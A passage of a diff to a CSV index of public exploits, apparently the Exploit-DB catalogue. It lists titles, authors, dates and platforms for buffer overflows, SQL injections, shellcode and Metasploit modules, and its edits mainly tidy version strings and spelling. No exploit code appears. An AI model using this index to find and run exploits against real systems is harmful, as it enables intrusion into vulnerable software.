16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS",2011-01-16,"Mark Stanislav",php,webapps,0 @@ -13868,9 +13868,9 @@ id,file,description,date,author,platform,type,port 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 -16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 +16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection",2011-04-24,mArTi,php,webapps,0 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow",2011-04-25,Metasploit,windows,local,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 @@ -13880,7 +13880,7 @@ id,file,description,date,author,platform,type,port 16021,platforms/windows/dos/16021.c,"Look n stop - Local DoS (0Day)",2011-01-21,Heurs,windows,dos,0 16022,platforms/windows/dos/16022.c,"Panda Global Protection 2010 - Local DoS",2011-01-21,Heurs,windows,dos,0 16023,platforms/windows/dos/16023.c,"Panda Global Protection 2010 - Local DoS (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos,0 -16024,platforms/windows/local/16024.txt,"Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 +16024,platforms/windows/local/16024.txt,"Microsoft Fax Cover Page Editor 5.2.3790.3959 Double Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0 16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 portbind + fork shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16027,platforms/php/webapps/16027.txt,"phpcms 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0 @@ -13899,7 +13899,7 @@ id,file,description,date,author,platform,type,port 16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16049,platforms/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion",2011-01-26,Cucura,php,webapps,0 16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload",2011-01-26,DIES3L,php,webapps,0 -16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0 +16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,php,webapps,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16053,platforms/windows/remote/16053.txt,"Oracle Document Capture Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 @@ -13916,7 +13916,7 @@ id,file,description,date,author,platform,type,port 16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - (.m3u) Buffer Overflow + DEP Bypass",2011-01-29,sickness,windows,local,0 16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow (seh)",2011-01-29,m0nna,windows,local,0 -16074,platforms/php/webapps/16074.txt,"MultiCMS Local File Inclusion Vulnerbility",2011-01-29,R3VAN_BASTARD,php,webapps,0 +16074,platforms/php/webapps/16074.txt,"MultiCMS Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps,0 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks",2011-01-30,MaXe,php,webapps,0 16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0 @@ -13935,12 +13935,12 @@ id,file,description,date,author,platform,type,port 16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 -16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 - CSRF",2011-02-02,"Aung Khant",php,webapps,0 +16097,platforms/php/webapps/16097.txt,"Zikula CMS 1.2.4 - CSRF",2011-02-02,"Aung Khant",php,webapps,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Android 1.x/2.x - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 -16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 +16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,windows,remote,0 16106,platforms/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 @@ -13951,7 +13951,7 @@ id,file,description,date,author,platform,type,port 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script SQL Injection Vunerability",2011-02-05,NoNameMT,php,webapps,0 -16119,platforms/freebsd/local/16119.c,"FreeBSD <= 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 +16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow DoS Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b (index.php) - SQL Injection",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -13987,7 +13987,7 @@ id,file,description,date,author,platform,type,port 16154,platforms/php/webapps/16154.txt,"Horde Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 16155,platforms/php/webapps/16155.txt,"Geomi CMS 1.2 & 3.0 - SQL Injection",2011-02-11,"ThunDEr HeaD",php,webapps,0 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13 / < 1.6.3 - SQL Injection",2011-02-11,"Red Matter",php,webapps,0 -16157,platforms/jsp/webapps/16157.py,"Openedit <= 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 +16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS Blind SQL Injection Vunerability",2011-02-12,NoNameMT,php,webapps,0 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 - Multiple POST Variables SQL Injection",2011-02-12,LiquidWorm,php,webapps,0 @@ -14017,8 +14017,8 @@ id,file,description,date,author,platform,type,port 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS Blind SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a HTTP Referer stored XSS",2011-02-20,"Saif El-Sherei",php,webapps,0 -16200,platforms/php/webapps/16200.py,"JAKCMS <= 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 -16201,platforms/php/webapps/16201.py,"JAKCMS <= 2.01 RC1 - Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 +16200,platforms/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 +16201,platforms/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection",2011-02-21,Crazyball,php,webapps,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16203,platforms/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,windows,dos,0 @@ -14068,14 +14068,14 @@ id,file,description,date,author,platform,type,port 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 -16263,platforms/linux/dos/16263.c,"Linux Kernel <= 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 +16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection",2011-03-02,eXeSoul,php,webapps,0 16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 -16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 +16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs (view.php) SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 @@ -14107,7 +14107,7 @@ id,file,description,date,author,platform,type,port 16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,Metasploit,multiple,remote,0 16305,platforms/multiple/remote/16305.rb,"Java RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,Metasploit,multiple,remote,0 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,Metasploit,windows,remote,0 -16307,platforms/multiple/local/16307.rb,"PeaZip <= 2.6.1 Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 +16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,Metasploit,multiple,remote,0 16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 @@ -14135,7 +14135,7 @@ id,file,description,date,author,platform,type,port 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Windows Media Services ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,Metasploit,windows,remote,0 -16335,platforms/windows/remote/16335.rb,"WinComLPD <= 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD Request Overflow",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14170,7 +14170,7 @@ id,file,description,date,author,platform,type,port 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,Metasploit,windows,remote,0 16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,Metasploit,windows,remote,0 -16370,platforms/windows/remote/16370.rb,"Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,Metasploit,windows,remote,0 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,Metasploit,windows,remote,0 16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,Metasploit,windows,remote,0 @@ -14222,7 +14222,7 @@ id,file,description,date,author,platform,type,port 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 -16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 - PRIVMSG Handling Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 @@ -14260,10 +14260,10 @@ id,file,description,date,author,platform,type,port 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,Metasploit,windows,remote,0 16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 @@ -14278,20 +14278,20 @@ id,file,description,date,author,platform,type,port 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) Login Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,Metasploit,windows,remote,0 -16478,platforms/windows/remote/16478.rb,"Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow",2010-09-20,Metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable IMAPD W3C Logging Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16483,platforms/windows/remote/16483.rb,"Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d IMAP STATUS Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16486,platforms/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16488,platforms/windows/remote/16488.rb,"Novell NetMail 3.52d IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,Metasploit,windows,remote,0 +16491,platforms/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow",2009-12-06,Metasploit,windows,remote,0 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,Metasploit,windows,remote,0 16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 @@ -14315,7 +14315,7 @@ id,file,description,date,author,platform,type,port 16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 16513,platforms/windows/remote/16513.rb,"Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16514,platforms/windows/remote/16514.rb,"Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 -16515,platforms/windows/remote/16515.rb,"Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution",2010-05-26,Metasploit,windows,remote,0 +16515,platforms/windows/remote/16515.rb,"Worldweaver DX Studio Player 3.0.29 shell.execute() Command Execution",2010-05-26,Metasploit,windows,remote,0 16516,platforms/windows/remote/16516.rb,"Microsoft WMI Administration Tools ActiveX Buffer Overflow",2011-01-14,Metasploit,windows,remote,0 16517,platforms/windows/remote/16517.rb,"IBM Access Support ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt ActiveX WriteFile Unsafe Method",2010-09-20,Metasploit,windows,remote,0 @@ -14440,7 +14440,7 @@ id,file,description,date,author,platform,type,port 16637,platforms/windows/local/16637.rb,"VideoLAN VLC MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 16638,platforms/windows/remote/16638.rb,"DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,Metasploit,windows,remote,0 16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16640,platforms/windows/local/16640.rb,"FeedDemon <= 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16640,platforms/windows/local/16640.rb,"FeedDemon 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 @@ -14459,7 +14459,7 @@ id,file,description,date,author,platform,type,port 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,Metasploit,aix,dos,0 16658,platforms/windows/local/16658.rb,"VUPlayer - (.cue) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 -16659,platforms/aix/local/16659.rb,"Cain & Abel <= 4.9.24 - RDP Buffer Overflow",2010-11-24,Metasploit,aix,local,0 +16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow",2010-11-24,Metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,Metasploit,windows,local,0 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 @@ -14489,7 +14489,7 @@ id,file,description,date,author,platform,type,port 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (.pls) Stack Buffer Overflow",2010-11-24,Metasploit,windows,local,0 -16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,Metasploit,windows,remote,23 +16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow",2010-04-30,Metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,Metasploit,windows,remote,3128 @@ -14511,7 +14511,7 @@ id,file,description,date,author,platform,type,port 16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,Metasploit,windows,remote,0 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 +16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,Metasploit,windows,remote,21 16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,Metasploit,windows,remote,0 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,Metasploit,windows,remote,2100 @@ -14534,10 +14534,10 @@ id,file,description,date,author,platform,type,port 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 